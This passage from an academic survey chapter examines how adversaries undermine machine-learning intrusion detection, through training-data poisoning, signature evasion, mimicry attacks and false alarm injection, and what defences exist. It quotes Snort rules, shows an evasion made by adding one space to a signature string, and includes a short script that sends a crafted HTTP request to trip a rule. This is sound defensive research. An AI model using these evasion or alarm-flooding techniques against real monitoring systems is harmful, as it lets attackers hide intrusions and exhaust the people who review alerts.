These two types of noise can be defined more clearly if we refer to a specific IDS paradigm. Let us analyze the effect of these two types of noise when anomaly-based IDS are considered. We can collect the data and assume that all patterns belong to the legitimate class (a reasonable assumption in a real-world scenario, because usually the great majority of patterns belong to this class [Kruegel et al. (2005) (a)]). In this case, the independent noise is made up of attacks against the monitored host(s) that are collected during the acquisition of the training set. These attacks can be considered as accidentally contained in the training data, because the attacker's goal was not to interfere with the correct model selection. Typically the small percentage of independent noise is correctly handled by learning algorithms, and it doesn't significantly affect the design of the anomaly detector. On the other hand, an adversary can intentionally pollute the training set with patterns that do not represent legitimate activities (malicious noise). Such patterns may be crafted in order to significantly affect the selection of the model of the legitimate activity.

To explain the capabilities and problems of machine learning algorithms, an attack against a learning system can be classified by analyzing its influence (causative/exploratory), specificity (targeted/indiscriminate) and security violation (integrity/availability) [Barreno et al. (2006)]. A causative attack influences the training process, whereas an exploratory attack does not alter the training but tries to discover information about the learner (e.g., the training data used). An attack is targeted if its goal is well defined (e.g., to further exploit a specific vulnerability), and indiscriminate if its goal is general (e.g., to increase the IDS false negative/positive rate). An integrity attack exploits weaknesses of the training algorithm, forcing it to classify intrusion points as normal points (false negatives), whereas an availability attack alters the knowledge of the training system so that it becomes useless (e.g., too many false positives/false negatives). It is worth noting that a causative attack reflects exactly our definition of malicious noise.

Beyond the general influence of malicious noise on model selection, different classes of machine learning algorithms may exhibit different strengths in an adversarial environment. For the sake of the following discussion, we subdivide machine learning algorithms into incremental (on-line) and off-line training algorithms. Incremental algorithms modify their model incrementally, that is, the model may change every time a new pattern is processed. These algorithms are useful to deal with systems in evolution, as they can adapt their model every time they analyze a pattern. Conversely, off-line algorithms need a well-specified training set, and they can analyze patterns only after the entire training set is available. In other words, the training and analysis phases are performed in non-overlapping time intervals, and the adversary has a bounded time interval in which to inject malicious noise, that is, the time interval when the training data is acquired. As evidenced in [Barreno et al. (2006)], incremental algorithms allow for a gradual tampering of the training data. This fact forces the adversary to follow different attack strategies against incremental and off-line training algorithms, respectively.

5.4.2 Adversarial environment against Model Selection: Solutions


The above discussion clearly points out that learning algorithms should be carefully designed to deal with malicious errors. A learning algorithm that has been specifically designed to take into account malicious patterns in the training set is the distribution-free model of learning [Valiant (1985)]. In addition, some extensions to this model have been proposed so that a bound on classification errors can be fixed [Kearns and Ming (1988)]. However, in our opinion, the use of these techniques in the intrusion detection domain is far from practical, as the theoretical formulation of the learning algorithm should be carefully mapped to the problem of computer intrusions.

In general, to cope with malicious noise, we identify a possible advantage if only the legitimate activity class is used to select the model (anomaly-based IDS) and an off-line training algorithm is used. That is, we can assume that the great majority of patterns in the training set represents the target class. In this case, the malicious noise is only associated to patterns that are not representative of the legitimate class.

Since an off-line training algorithm is used, the attacker has a bounded time interval in which to inject malicious noise. That is, he may leverage only a relatively low number of malicious patterns w.r.t. the total number of patterns in the training set. Thus, in order to significantly affect the model selection, the attacker has to inject patterns that are significantly different from those representing the target class. In such a way, during the classification phase some attacks may go undetected (false negatives), e.g., because such attacks share some similarities with the malicious noise in the training set. However, since the malicious patterns must be significantly different from those representing the legitimate class, they may be removed by means of outlier detection techniques.

If the learning system is aimed at modeling the attack class, an analogous process may not be suitable. In this case, we cannot assume that the great majority of patterns in the training set represents the target class. If we exclude legitimate activity patterns from this training set (i.e., those legitimate patterns that have mistakenly passed the preprocessing phase), both the patterns related to attacks and the patterns related to malicious noise have the same source: the adversary. This implies that the ratio between the number of attack patterns and the number of malicious patterns in the training set depends only on the adversary. So, in this case, the confidence in the estimation of the data distribution may be weaker.

In our opinion, a key point in model selection is whether an attacker has exact knowledge of the details of the model selection phase, so that it can be influenced by malicious patterns. The adversary can use the knowledge of the machine learning algorithm used, and of its training set, to craft malicious noise. However, we note that this knowledge does not imply that the attacker is able to conceive effective malicious noise. For example, a machine learning algorithm can be selected randomly from a predefined set. As the malicious noise has to be well crafted for a specific machine learning algorithm, the adversary cannot be sure of the attack's success. Furthermore, the random initialization of the machine learning algorithm may be useful to deal with malicious noise. For example, if Hidden Markov Models (HMM) are used, we can provide random initialization of the state transition and symbol emission probability matrices. Generally, this set-up is used when no a priori information is available regarding the structure of the sequences in the training set. To be effective, the malicious noise may have to be conceived taking the initialization into account, because, for example, if the Baum-Welch algorithm is used, the final HMM depends on the initial parameters. So, due to different random initializations, the adversary may not know exactly how to conceive malicious patterns to affect, to his own advantage, the model selection. The same reasoning can be applied to every machine learning algorithm, for instance those used to train neural networks, or to perform clustering (e.g., k-means). In fact, at a high level, some kind of randomization procedure has been suggested as a possible way to address targeted malicious noise in [Barreno et al. (2006)]. Finally, when an off-line algorithm is employed, it is possible to randomly select the training patterns: in this way the adversary is never able to know exactly the composition of the training set. This approach has been applied to cope with noisy patterns in anomaly-based intrusion detection [Cretu et al. (2008)].
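
A minimal sketch of this last idea: each (re)training run draws a different random subset of the collected patterns, so the exact training composition is never predictable by the adversary.

    # Randomly subsample the collected data before each (re)training run.
    import random

    def sample_training_set(patterns, fraction=0.8):
        rng = random.SystemRandom()  # unpredictable source, not seedable
        return rng.sample(patterns, int(len(patterns) * fraction))

    pool = ["pattern_%d" % i for i in range(1000)]  # hypothetical collected data
    run_a = set(sample_training_set(pool))
    run_b = set(sample_training_set(pool))
    print(len(run_a & run_b))  # the overlap varies from run to run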

5.5 Classification and result analysis


In this Section we discuss the problems and solutions of the classification and result analysis phase in an adversarial environment. Two approaches are typically used to perform classification, i.e., anomaly- and misuse-based detection. Misuse- and anomaly-based IDS have different pros and cons in an adversarial environment. In this Section we describe the vulnerabilities of this step and the proposed solutions, by analyzing misuse- and anomaly-based IDS separately. Finally, we propose some general solutions, in Sections 5.5.5 and 5.5.4, which are mainly based on ensemble approaches.

Table 5.1: Summary of the key issues of the classification and result analysis step.

ATTACK              DETECTION TECHNIQUE
TECHNIQUE           Misuse-based                           Anomaly-based

Evasion             the adversary may modify an attack     the adversary may modify an attack
                    so that the new attack instance        to mimic normal traffic patterns
                    does not match any signature for       (Section 5.5.3.1)
                    this attack (Section 5.5.2.1)

False Alarm         the adversary may submit patterns      the adversary may submit anomalous
Injection           which match one or more signatures,    patterns which do not reflect any
                    but do not reflect any threat for      threat for the monitored systems
                    the monitored systems                  (Section 5.5.3.2)
                    (Section 5.5.2.2)

Motivation and purposes The classification and result analysis step represents the final phase of the intrusion detection task. In this step an alert is produced if the observed pattern is evaluated as being related to an attack by the model selected in the previous phase. Then, a further step can be performed, aimed at analyzing these results using a higher-level interpretation of events. This phase is usually called alarm correlation, as the evidence of an attack is better seen by clustering alarms related to the same event, while removing spurious alarms produced by noisy patterns.

5.5.1 Problem overview


There are two principal ways a skilled adversary can use to affect this step and hide attack traces:

• Intrusion Detection Evasion, aimed at preventing the detection of an attack by the IDS;

• False Alarm Injection (or over-stimulation), aimed at flooding the traces of a successful attack detected by the IDS with a very large number of false alarms, that is, noise.

Detection evasion is attained by an attacker when a successful attack against the monitored hosts is not detected by the IDS. Thus, no alerts related to this attack are recorded in the alerting log of the IDS. Obviously, this is an undesirable situation. On the other hand, the risks related to over-stimulation are less obvious. Let us recall that the alert log of an IDS needs to be analyzed by a security administrator, and consequently the presence of false alarms requires a huge analysis effort, especially in networks with high volumes of traffic. An adversary can deliberately inject false alarms to increase this effort, exploiting IDS classification weaknesses. Table 5.1 summarizes how these two techniques may affect anomaly- and misuse-based classification, respectively. A distinct paragraph is dedicated to the analysis of each of these issues. However, before such an analysis, in the following Section we discuss false alarm injection in more detail, as we believe it is a less evident problem in the research literature.

5.5.1.1 False Alarms Injection (over-stimulation)

As discussed in the introduction, even if all attacks have been detected and the
related alerts have been stored, they might not be easily extracted from the alert
log due to high volumes of false alarms. An estimate of the probability that a given
alert reflects a real attack can be written as:

    P(attack|alert) = attackNum(log) / alertNum(log)    (5.1)

where attackNum(log) and alertNum(log) represent the number of real attacks,
and the number of alerts, respectively, for a given IDS log. This probability reflects
what we will call alerting log reliability: the closer this value to one, the higher the
alerting log reliability. Obviously, the larger the number of alerts used to estimate
the reliability, the closer this estimate to the real P(attack|alert). In real world
cases, real attacks are extracted from the IDS log through a thorough log analysis
accomplished by the security auditor(s), using their expertise, and some semi-automated
alert clustering/correlation mechanisms. For an enterprise that manages
high volumes of network traffic (e.g., an Internet Service Provider (ISP)), this effort
translates into high costs and the allocation of huge resources. Analogously to the
classification of noise given in Section 5.4, it is possible to single out two principal
types of false alarms:

• legitimate activity patterns (that is, patterns generated by users using services
as expected) classified as attacks;

• injected (malicious) patterns conceived to be classified as attacks, but that
actually do not represent attacks.[4] False Alarm Injection is the act of generating
such patterns.

[4] These patterns do not reflect attacks against monitored hosts. In some sense, they can be
considered as attacks against the information content of the alerting log, as they aim to decrease
the signal-to-noise ratio of the alerting log content.

The common practice followed during the testing phase of an IDS for the evaluation
of the false positive (alarm) rate is carried out by submitting instances of legitimate

activity to the IDS, and by keeping track of the alerts generated accordingly. The
result of this evaluation clearly provides a lower bound for the false positive rate,
as it does not take into account the contribution of false alarm injection. Let us
explain how the over-stimulation problem can affect the alerting log reliability. Let
us express the probability P(attack|alert) using the Bayes formula, as done by
Axelsson [Axelsson (2000)]:

    P(attack|alert) = [P(alert|attack) · P(attack)] /
                      [P(alert|attack) · P(attack) + P(alert|¬attack) · P(¬attack)]    (5.2)

Let us assume the availability of an IDS that detects all attacks, that is,
P(alert|attack) = 1. Equation 5.2 can be rewritten as:

    P(attack|alert) = 1 / (1 + α),    where    α = [P(alert|¬attack) · P(¬attack)] / P(attack)    (5.3)

The higher the value of α, the lower the alerting log reliability. By
following the previous definition, the probability of false alarms P(alert|¬attack) ·
P(¬attack) can be expressed as the sum of two independent terms:

    P(alert|¬attack) · P(¬attack) = P(alert|legitimate) · P(legitimate)
                                    + P(alert|malicious) · P(malicious)    (5.4)

with:

    P(legitimate) + P(malicious) = P(¬attack)

where P(legitimate) is the probability that the pattern is legitimate, P(malicious)
is the probability that the pattern is malicious,[5] and P(alert|legitimate) and
P(alert|malicious) are the probabilities that an alert is raised, given a pattern
that is legitimate or malicious, respectively.

[5] This malicious pattern is conceived so that an alert is raised, but it is not an attack from the
point of view of monitored hosts.
In a typical real situation, legitimate activities largely outnumber attacks, that
is, P(legitimate) ≫ P(malicious), and we can expect that P(malicious) ∼
P(attack), because malicious patterns are produced by the adversary. However,
we also expect that P(alert|legitimate) ≪ P(alert|malicious), because for an
effective IDS P(alert|legitimate) must be very low, and P(alert|malicious) should
be very high, if we suppose well-crafted (and thus effective) malicious patterns. As a
consequence, the contribution given by false alarm injection can be very significant.
For example, if we have:

• P(alert|attack) = 1, i.e., the IDS detects all attacks;

• P(alert|legitimate) = 0.005, i.e., the IDS is good at producing a very low
false positive rate;

• P(alert|malicious) = 0.99, i.e., a malicious pattern is conceived to successfully
raise an alert;

• P(legitimate) = 0.996, i.e., legitimate patterns are the great majority of non-attack
patterns;

• P(malicious) = 0.003, i.e., for every 3 false alarms injected. . .

• P(attack) = 0.001, i.e., . . . the adversary performs one attack.

Combining equations 5.3 and 5.4:

    α = [P(alert|legitimate) · P(legitimate) + P(alert|malicious) · P(malicious)] / P(attack)
      = ((0.005 · 0.996) + (0.99 · 0.003)) / 0.001 ≈ 8

thus P(attack|alert) = 1/(1 + α) = 1/9 ≈ 11%. Therefore, to find an alert related
to a successful attack, 9 alerts must be scrutinized on average. On the other hand,
if attackers do not use over-stimulation, and only aim to attack the protected hosts,
then P(attack) = 0.004 and α = (0.005 · 0.996)/0.004 ≈ 1.25, so that
P(attack|alert) = 1/(1 + α) ≈ 1/2.25 ≈ 44%, that is, the alerting log reliability
significantly increases.
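The arithmetic above can be checked with a short script. The following minimal
sketch simply evaluates equations 5.3 and 5.4 with the illustrative probabilities
assumed in the example (function and variable names are ours):

# Minimal sketch: alerting log reliability P(attack|alert) under the
# illustrative probabilities assumed in the example above (Eqs. 5.3-5.4).
def reliability(p_alert_legit, p_legit, p_alert_mal, p_mal, p_attack,
                p_alert_attack=1.0):
    # alpha as in Eq. 5.3, with the false alarm probability expanded via Eq. 5.4
    alpha = (p_alert_legit * p_legit + p_alert_mal * p_mal) / p_attack
    return p_alert_attack / (p_alert_attack + alpha)

# With over-stimulation (3 injected false alarms per real attack)
print(reliability(0.005, 0.996, 0.99, 0.003, 0.001))   # ~0.11
# Without over-stimulation (the adversary only performs real attacks)
print(reliability(0.005, 0.996, 0.0, 0.0, 0.004))      # ~0.44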

This example is useful to point out that real IDS capabilities can be overestimated,
often with surprising consequences. Whereas most of the effort spent
during the development of an IDS is focused on the maximization of the detection
capability, often less effort is devoted to bounding the false alarm rate, and in
particular to the false alarm injection problem.

Now the question is: how can an IDS be protected against false alarm injection?
In the following, we will give some answers, by observing that anomaly- and misuse-based
IDS have different strengths and weaknesses not only w.r.t. detection evasion,
but also w.r.t. false alarm injection.

5.5.2 Misuse-based classification and result analysis

Motivation and purposes A misuse-based IDS detects attacks by comparing
observed patterns to stored attack signatures. Essentially, such an IDS looks for
known attacks, described through a precise model (signature). So, the number of
false alarms generated by legitimate activities can be very low if signatures are very
specific.

5.5.2.1 Misuse-based Detection evasion

The ability of a misuse-based IDS to detect attacks is strongly affected by the quality
of the corresponding signatures, but it is also limited to known attacks. The definition of
these signatures mainly relies on human expertise, as in Snort, or on machine learning
algorithms, as in Polygraph. Unfortunately, manually or automatically building
good signatures is very difficult. Attacks that exploit a specific vulnerability can
succeed in many different ways (many attack instances that exploit the same
vulnerability), and building models that take into account all those instances is very

hard. As evidenced in [Mutz et al. (2005)], generally a misuse-based IDS allows
detecting all event sequences that match a signature, but these signatures only cover
a subset of all the possible instances of the same attack.
Conversely, a misuse-based approach allows for low false alarm rates, because
for all known attack instances it is possible to select the most discriminant features,
and the corresponding values. In fact, both commercial [IBM ISS IPS, Cisco IPS]
and open source (e.g. [Snort]) IDS rely heavily on the misuse paradigm for this
desirable property.
A way to estimate the quality of a specific signature is to build many variants
of the same attack and evaluate the fraction of detected attacks. The authors in
[Vigna et al. (2004)] describe such an estimation procedure, where a large number
of attack variants is generated by applying mutant operators to an attack template.
That is, a mutant operator builds different attack instances from the same attack
template. A similar work, using a genetic algorithm to generate different instances
of a buffer overflow attack, is presented in [Kayacik et al. (2006)].
The automatic development of an evading attack requires perfect knowledge
of the signatures used by the IDS to be evaded. Commercial systems typically
rely on keeping the signatures secret to increase their resistance to evasion
or over-stimulation attacks. However, in the intrusion detection research field
it is well-known that security through obscurity does not work. The authors in
[Mutz et al. (2005)] proved this assertion by using a reverse engineering process to
understand the way signatures are matched by a commercial (ISS RealSecure version
7.0) misuse-based NIDS.
In [Mutz et al. (2005)] a successful HTTP chunk encoding attack (see Section
5.3.1) that evades detection by Snort is also shown. The signature implemented
in Snort for this attack is based on matching the content of TCP packets with a
fixed string CCCCCCC:\<space>AAAAAAAAAAAAAAAAAAA. In this case, the signature
represents the description of a single attack instance. As a consequence, it is easy to
see that by simply adding another space in the attack string (obtaining CCCCCCC:\
<space><space>AAA...) the same attack works successfully (because server-side
effects do not change), and it goes unnoticed because the string matching procedure
fails.
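The brittleness of such instance-specific matching can be illustrated with a toy
check (a minimal sketch; the payloads are illustrative, with <space> written out
explicitly):

# Minimal sketch: a signature that describes a single attack instance via
# exact substring matching is evaded by a trivial mutation (one extra space).
SIGNATURE = "CCCCCCC:\\ " + "A" * 19            # the fixed string quoted above

original_attack = "HEADER " + "CCCCCCC:\\ " + "A" * 19 + " TRAILER"
mutated_attack  = "HEADER " + "CCCCCCC:\\  " + "A" * 19 + " TRAILER"  # extra space

print(SIGNATURE in original_attack)   # True: detected
print(SIGNATURE in mutated_attack)    # False: same server-side effect, no match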

Misuse-based Detection evasion: Solutions Typically, an adversary can
evade the detection of a misuse-based IDS because:

• either the IDS does not have a signature for that attack;

• or the IDS has a signature for that attack, but it does not match the
specific attack instance.

Machine learning algorithms represent a very interesting response to attacks for
which a signature is not available. Furthermore, to realize evading attacks, a good
knowledge of the used signatures is necessary. In this case, as evidenced in Section
5.4.2, for an adversary it can be difficult to realize evading attacks if the machine

learning algorithm has been designed so that signatures cannot be exactly extracted
by an attacker through a query-response mechanism. However, in our opinion, an effective
solution against evasion in misuse-based IDS involves both the signature definition
process and the choice of the signature matching techniques.

Usually, an attack signature is implemented as a set of rules, following a specific
syntax. To detect various types of evading attacks and decrease the evasion
probability of rule-based pattern matching, it is possible to use a Two-step Rule
Estimation (TRE) [Byeong-Cheol et al. (2004)]. Such a method comprises two processes:
(1) a preprocessor searches for the optimal rule similar to a captured packet,
(2) a processor performs an adaptive pattern matching. The TRE method can
address evading attacks because it adds some flexibility in the signature definition
process that can help to find attack variations. It would be interesting to investigate
whether such a method can be used in the classification phase of a signature generator
based on machine learning algorithms. That is, beyond the enhancement of the
signature building phase, it can be useful to enhance the capabilities of the signature
matching phase.

Beyond general solutions, there are specific solutions that can enforce or tune
correct misuse detection. Much attention is given to buffer overflow attacks,
especially when polymorphic mechanisms are used to evade IDS detection.

The authors in [Akritidis et al. (2005)] detect polymorphic buffer overflows by
searching the network traffic for a sled component. A sled component is a set
of additional instructions (i.e., NOP instructions[6]) used by these attacks to cope
with the approximate knowledge of the absolute address where the stack starts.

[6] These operations do not affect the exploit behavior, but they are useful to increase the program
counter of the CPU, until the address of the injected shellcode is reached.
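As a toy illustration of the sled idea (not the actual detector of
[Akritidis et al. (2005)], which handles far more general sled encodings), a naive
scanner might flag payloads containing long runs of the x86 NOP opcode 0x90:

# Minimal sketch: flag payloads containing a long run of x86 NOP bytes
# (0x90), a crude indicator of a sled. Real sleds use many semantically
# equivalent instruction sequences, so this check alone is trivially
# evadable; it only illustrates the concept.
def has_naive_sled(payload: bytes, min_run: int = 32) -> bool:
    run = 0
    for b in payload:
        run = run + 1 if b == 0x90 else 0
        if run >= min_run:
            return True
    return False

print(has_naive_sled(b"\x90" * 64 + b"<shellcode>"))  # True
print(has_naive_sled(b"GET /index.html HTTP/1.1"))    # False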

Biologically inspired systems have also been proposed. Biological analogies are
useful because many problems that researchers try to confront are already solved
(or greatly reduced) in nature. In [Stephenson and Sikdar (2006)] a model based
on the coevolution of biological quasi-species is proposed to describe polymorphic
worm propagation. In such a work, the worm evasion problem is posed principally
in terms of mutation rate and response time. Given this model, it is possible to
calculate the maximum allowable response time of the IDS in order to contain the
spread of the worm, and the optimal mutation rate that a polymorphic worm should
employ in order to evade an IDS with a known response time. That is, even if an
IDS has a good machine learning technique to model polymorphic worm attacks, a
worm can still evade detection because the response time of the IDS is too long with
respect to the worm mutation rate. Thus, it can be useful to know if a worm cannot
be detected for this reason. That work points out that machine learning systems can
be used to evaluate some characteristics and performance of an IDS.

A polymorphic worm can encrypt its own invariant parts to escape detection by
a signature-based IDS. But, in such a case, a decryption routine is necessary
before launching the worm exploit. Thus, with a NIDS, self-decrypting
exploit codes can be detected by scanning network traffic for the presence of

a decryption routine, using static analysis and emulating instruction execution
[Zhan et al. (2007)].

We note that many of the works regarding misuse-based IDS are suited to specific
(new) problem instances. Because of this, these solutions can often be easily
bypassed by a skilled adversary. It should be recognized that, to cope with evasion
techniques against misuse-based IDS, one needs to focus on the root causes of
an attack, avoiding signatures for specific attack instances. Through the knowledge
of attack root causes, it is possible to focus on discriminant features, reducing the
impact of evasion techniques. Even if this is not a trivial task, this is the key point
of a reliable misuse-based IDS.

5.5.2.2 False alarm injection against Misuse-based Classification

The signatures of a misuse-based IDS represent the result of an accurate analysis of
the distinctive features of an attack with respect to the legitimate activity. Therefore,
it is typically difficult for a misuse-based IDS to classify a pattern generated by
a normal user (i.e., an instance of legitimate activity) as an attack. Unfortunately,
an attacker can generate patterns that explicitly match the signatures of the
IDS, even if these patterns do not represent attacks from the point of view of the
protected hosts. Essentially, this is possible because:

1. the attacker has knowledge of the IDS signatures, and he uses this knowledge
to craft patterns that match the signatures;

2. a stateful pattern analysis is not correctly performed (or it is not performed
at all) to assess if this pattern is actually related to an attack or not.

With reference to item (1), this knowledge can be easily gained if the signatures
of the target IDS are publicly available (e.g., the open-source IDS project Snort).
On the other hand, if an automatic signature generator is used, then it is more
difficult to gain exact knowledge of the signatures, because each signature depends
on the training data. Typically, automatic signature generators are implemented by
machine learning algorithms. However, if the adversary gains access to the training
data, and the machine learning algorithm used to generate the signatures is known,
then he may reconstruct the signatures. In Section 5.4.2, we discussed a
possible solution based on randomization techniques. Furthermore, if the adversary
is able to access the outputs of an IDS, he can infer the signatures through
suitable queries. As an example, an adversary can submit patterns with different
feature values, and, by accessing the outputs of the IDS, he can try to reconstruct
the internal signatures of the IDS. This is a reverse engineering approach, the same
used in [Mutz et al. (2005)] to reconstruct the signatures of the commercial NIDS
ISS RealSecure.

No matter how the adversary gains the signatures of the target IDS, it has
been shown that an attacker can generate non-malicious packets
crafted to match any signature, thus injecting an unbounded number of false alarms

[Patton et al. (2001), Yurcik (2002)]. In particular, real world examples are carried
out on Snort, due to the availability of its signatures. In the following we will refer to
Snort as an example, but the related comments are valid whenever the attacker is
able to obtain the signatures.

As far as item (2) is concerned, it is worth pointing out that often only some
stateful features of the traffic can be analyzed, because of the excessive
expense in terms of memory capacity and computation needed to perform a complete
stateful analysis. Especially when large volumes of traffic are involved, a
trade-off between the need for stateful analysis by the IDS and the need for real-time
detection capabilities typically becomes necessary. This implies an exposure to false
alarm injection based on those stateful features that are not considered by the
IDS due to real-time constraints. For example, Snort v. 1.6.3 was vulnerable to false
alarm injection, because it did not perform a stateful analysis of the TCP session
[Patton et al. (2001), Yurcik (2002)]. Consider the Snort signature:

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 (msg:"EXPLOIT
ssh CRC32 overflow filler"; content:"|00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00|"; reference:bugtraq,2347;
reference:cve,2001-0144;)

This signature

raises an alert for every TCP packet containing the bytes specified by the content
field, to detect a buffer overflow against an SSH server, without assessing whether
such a TCP packet pertains to a TCP session or not. Even if a TCP packet that
does not pertain to a TCP session is discarded by the destination host, a false alert
is raised by Snort if such a packet contains the byte sequence specified by the signature.
Even though versions of Snort starting from 2.1.1 include a module that performs
TCP session reconstruction (stream4), Snort is still vulnerable to false alarm injection
(and evasion) using attacks related to the HTTP level. Let us make an example.
The signature:
The signature:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"WEB-IIS NewsPro administration authentication attempt";
flow:to_server,established; content:"logged,true"; reference:
bugtraq,4672; classtype:web-application-activity; sid:1756; rev:5;)

uses the stream4 module to assess whether the analyzed TCP packet pertains to a TCP
session (flow:to_server,established statement). However, even if this signature
is related to an attack at the HTTP level, it does not consider the meaning of
HTTP messages, because it does not perform stateful analysis at the HTTP level.
Instead, it simply looks for the string logged,true anywhere in the HTTP traffic.
Obviously, in this case false alarms can be easily injected by simply adding such a
string in the HTTP traffic flow.
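For instance, a perfectly benign request such as the following minimal sketch (the
target host name is a hypothetical monitored server) carries the string through an
established HTTP session and triggers the rule:

# Minimal sketch: a benign HTTP request that matches the Snort rule above.
# The rule fires on the string "logged,true" anywhere in established HTTP
# traffic, so embedding it in a harmless query parameter injects a false alarm.
import http.client

conn = http.client.HTTPConnection("www.example.com", 80)  # hypothetical host
conn.request("GET", "/guestbook?comment=logged,true")     # no attack semantics
print(conn.getresponse().status)
conn.close()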

The latter example is useful to note some differences between the evasion and
over-stimulation points of view. If we suppose that the string logged,true is a
necessary content value for the attack, a stateful analysis at the HTTP level does not

increase the robustness against evading attacks, that is, we can neglect the HTTP
session analysis. Conversely, from the over-stimulation point of view, statefulness
is fundamental. The key question is: is the string logged,true, matched anywhere,
a real sign of attack? We can thus conclude that such a signature is written by
taking into account the point of view of attack detection, rather than a trade-off
between detection and false alarm production.

False alarm injection against Misuse-based Classification: Solutions As
discussed previously, to perform false alarm injection (but also evasion) against a
misuse-based IDS, one needs to know (or infer) the signatures employed by the
IDS. Thus, if the attacker does not have such knowledge, it may be difficult to
perform false alarm injection. However, in our opinion, an effective solution against
false alarm injection in misuse-based IDS must be developed at the abstraction level
where the analysis is performed. This abstraction level is reflected in the signature
definition. The key question to ask is: does the signature describe patterns
at the abstraction level where the attack works? The answer to this question is
strictly related to stateful analysis.

From our experience, almost every analysis performed by an IDS must be stateful to
guarantee detection reliability. Even if the analyzed protocol is stateless (e.g., UDP),
it is often better to base the analysis on additional contextual information w.r.t. the
actual content of a single packet. A clear example of stateful analysis in the case
of a non-stateful protocol is given by the detection of portscan attacks. Portscan
attacks probe the hosts in a network to find open ports and, therefore, the related
services (e.g., exploitable services). For example, such attacks can be realized by
sending UDP or TCP SYN packets to multiple ports, and evaluating the corresponding
responses. A single UDP packet does not necessarily imply a portscan attack,
as many applications use this protocol (e.g., video streaming). At the same time, a
single TCP SYN packet can be the first step of the three-way handshake protocol
used to initiate a TCP session. However, by performing a stateful analysis, that is,
correlating network events occurring at different times, it is possible to assess if a
certain UDP or TCP SYN packet is likely to be related to a portscan attack or not,
as sketched below.
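In this minimal sketch, the window size and threshold are illustrative assumptions:
a source that probes many distinct ports within a short time window is flagged,
while isolated packets are not.

# Minimal sketch of stateful portscan detection: count the distinct
# destination ports probed by each source IP within a sliding time
# window; isolated SYN/UDP packets never trigger an alert on their own.
from collections import defaultdict

WINDOW = 10.0      # seconds (illustrative)
THRESHOLD = 20     # distinct ports (illustrative)
events = defaultdict(list)   # src_ip -> [(timestamp, dst_port), ...]

def observe(src_ip: str, dst_port: int, t: float) -> bool:
    recent = [(ts, p) for ts, p in events[src_ip] if t - ts <= WINDOW]
    recent.append((t, dst_port))
    events[src_ip] = recent
    return len({p for _, p in recent}) >= THRESHOLD   # likely portscan?

# A single packet is not flagged...
print(observe("10.0.0.5", 80, 0.0))          # False
# ...but probing many ports within a few seconds is
print(any(observe("10.0.0.5", port, 0.1 * port) for port in range(1, 40)))  # True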
Now, let us refer to the (now historic) Ping of Death attack [Kenney (1997)].
This attack is based on the generation of an IP packet larger than the maximum IP
packet size, as reported in [RFC 792 (1981)] (65,535 bytes). A Ping of Death attack
instance is often realized by sending an ICMP echo reply subdivided into multiple
fragments that are reassembled only by the destination host. Even if ICMP is
not a stateful protocol, this attack instance cannot be detected without a stateful
analysis that evaluates the reassembly of fragments (in this case we suppose that an
event is generated for each packet).

In other cases, a stateful analysis is implied by a stateful protocol. For example,
to perform a complete TCP session analysis, one needs to keep track of the three-way
handshake between the two hosts, to check whether ack numbers are
consecutive (so as to correctly associate each packet to the specific TCP session),

and to look for a correct session termination procedure.

When Host-based IDS are taken into account, the statefulness of the analysis is
necessary to detect sophisticated attacks against the machine. In this case, statefulness
is realized by correlating events occurring in the same machine at different
time instants.

5.5.3 Anomaly-based classification and result analysis

Motivation and purposes An anomaly-based IDS detects attack patterns if they
are not included in the model of legitimate activity. In principle, it is possible to
detect attack variations or new attacks, because anomaly detectors do not include a
model of attacks. The anomaly detection paradigm is a good choice in environments
where normality (that is, a model describing the legitimate traffic) can be well
defined. For example, anomaly detection is useful when applied to a service-specific
IDS, for example, analyzing GET requests of the HTTP traffic, for which features
and their legitimate values can be well identified [Kruegel et al. (2005) (a)].

5.5.3.1 Anomaly-based Detection evasion

Typically, anomaly detectors may not provide information about the specific attack
that generated an alarm, because they detect anomalies. Whereas with signature-based
IDS it can be possible to deduce the attacker's purposes, the analysis of alerts
produced by anomaly-based approaches can be more difficult. This issue can be an
obstacle when the correlation of outputs from different IDS is carried out, and a
sophisticated attack needs to be detected.

Sometimes, it is possible to modify an attack to mimic the normal traffic, while
retaining its malicious potential, provided that the features used by the detectors are
known. This kind of attack is called a mimicry attack. If such a technique
works successfully, then it can be concluded that the features used to discriminate
between legitimate traffic and attacks are weak. Thus, during the design phase of
an anomaly detector, tests using mimicry attacks are valuable to determine its
weaknesses, and to identify ways of improvement. It is interesting to note that this
kind of attack is associated with the classification phase of an IDS, and it does not
exert control over the feature selection phase. In other words, this attack exploits
the uncertainty of the learned discrimination function.

It has also been shown that for a specific host-based anomaly detector, namely
STIDE, it is possible to successfully generate mimicry attacks with an automated
process [Kayacik et al. (2007)]. The authors used a genetic programming approach
to build all components of a mimicry attack against a vulnerable (local buffer
overflow) traceroute application. This is another reason suggesting that the
improvement of an anomaly detector should be carried out starting from the early
stages of its design, i.e., the feature extraction and selection phase.

Mimicry attacks can also be combined with worms. Worms can hide their
propagation by mutating so as to mimic the statistical profile of the normal traffic
(polymorphic blending attacks) [Kolesnikov and Lee (2004)]. In general, the generation
of attacks that optimally match the normal traffic profile is a hard problem (NP-complete),
but approximate solvers can be used to find a near-optimal solution
[Fogla and Lee (2006)].

Anomaly-based Detection evasion: Solutions It can be possible to have an
idea of the type of attack that most likely generated an anomaly. For example, this
may be possible if multiple and specialized anomaly detectors (e.g., one for each class
of attack) are deployed. This may be exploited to detect sophisticated attacks, by
correlating the outputs of multiple anomaly detectors. As we will discuss further, this
solution may also increase the robustness of anomaly-based systems against false
alarm injection.

In [Wagner and Soto (2002)] a theoretical framework is developed to evaluate
the robustness of a Host-based IDS against mimicry attacks. Different ways in
which an adversary can realize a mimicry attack are shown by referring to a HIDS
based on the analysis of operating system calls. They observed that the impact of
these attacks can be reduced if not only the executed system calls are taken into
account, but also the system calls which fail, considering the returned code and the
arguments that have been passed. This outcome can be generalized: to increase the
robustness against mimicry attacks, the number of features used to model legitimate
activity must be increased. Obviously, the collection of training data should
guarantee the availability of all such features.

A different approach designed to thwart mimicry attacks is based on the injection
of crafted human input alongside legitimate user activity [Borders et al. (2006)].
The crafted input is particularly designed to trigger a known sequence of network
requests, which is compared to the actual traffic: unexpected messages are considered
as malicious. The approach proposed in [Borders et al. (2006)] appears very
interesting, because it proposes a proactive method of system enforcement against
mimicry attacks. On the other hand, this method also presents some drawbacks,
because it can interfere with the original traffic semantics. In any case, in our opinion
proactive methods against mimicry attacks should be further investigated, as they
can be seen as a version of the Turing test.

